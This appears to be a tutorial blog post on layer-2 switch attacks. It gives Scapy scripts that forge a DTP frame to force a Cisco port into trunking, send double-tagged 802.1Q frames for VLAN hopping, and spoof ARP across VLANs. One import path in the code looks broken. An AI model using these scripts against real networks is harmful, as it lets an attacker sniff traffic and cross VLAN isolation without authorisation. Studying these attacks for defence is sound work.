DTP vulnerability attack and VLAN hopping attack

If a Cisco switch enabled DTP protocol on an interface, attacker can use their laptop send the Dynamic desirable frame to the interface, there for, the target interface will become Trunking port. This means we can modify our switch’s VLAN configuration and sniff any VLAN’s traffic.

Send DYNAMIC DESIRABLE frame

The library Scapy has a packet scapy.contrib.dtp, which contains negotiate_trunk method，the content is：

def negotiate_trunk(iface=conf.iface, mymac=str(RandMAC())):

    print "Trying to negotiate a trunk on interface %s" % iface

    p = Dot3(src=mymac, dst="01:00:0c:cc:cc:cc")/LLC()/SNAP()/DTP(tlvlist=[DTPDomain(),DTPStatus(),DTPType(),DTPNeighbor(neighbor=mymac)])

    sendp(p)

The first parameter is the interface name which is listening to the traffic.
The second parameter is optional, which is dodgy MAC address of the fake switch, if you don’t specify one, system will generate one randomly.

Create a code to mimic the Cisco Trunk desirable frame, which can be sent to :

import sys
from scapy.layers.ls import Dot3,LLC,SNAP
from scapy.contrib.dtp import *

if len(sys.argv)<2:
 print sys.argv[0]+"<dev>"
 sys.exit()

negotiate_trunk(iface=sys.argv[1])

VLAN hopping attack

Basic knowledge: http://frankfu.click/security/ccna-security/secure-the-lan.html/2/

Think about this scenario: a host A in VLAN1 send an ping packet to a host B in VLAN 2. We can use Library Scapy to create the Mal-created tag:

Now we create a ICMP packet across VLAN:

#!/usr/bin/python    

  

from scapy.all import *   

  

packet = Ether(dst="c0:d3:de:ad:be:ef") / \

                Dot1Q(vlan=1) / \

                Dot1Q(vlan=2) / \

                IP(dst="192.168.13.3") / \

                ICMP()    

  

sendp(packet)

上面的代码我们指定了目标主机的MAC和IP地址，添加了两个VLAN标识，第一个是发送数据的主机所在的VLAN，第二个是目标主机所在的VLAN。交换机会移除第一个标识，读到第二个标识的时候，会转发该数据包到目标主机。

We specified the MAC address and IP address in the code above, and added double VLAN tags, first tag is the VLAN tag of the sending host, second tag is the target host’s VLAN tag. The switch will rip off the first tag, then read the second one and send the Frame to the target host.

ARP spoof cross VLAN

Because the VLAN separates the broadcast domain, the previous code can be useful only in one VLAN. If you want to spoof cross VLANs, you have to insert the VLAN tags, following code will make this happen:

  def build_req():

        if options.target is None:

            pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], pdst=args[0])

        elif options.target:

            target_mac = getmacbyip(options.target)

            if target_mac is None:

                print "[-] Error: Could not resolve targets MAC address"

                sys.exit(1)

            pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)

 

        return pkt

Then we insert the Tag part：

pkt = Ether(src=mac, dst=target_mac) /Dot1Q(vlan=our_vlan) / Dot1Q(vlan=target_vlan) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)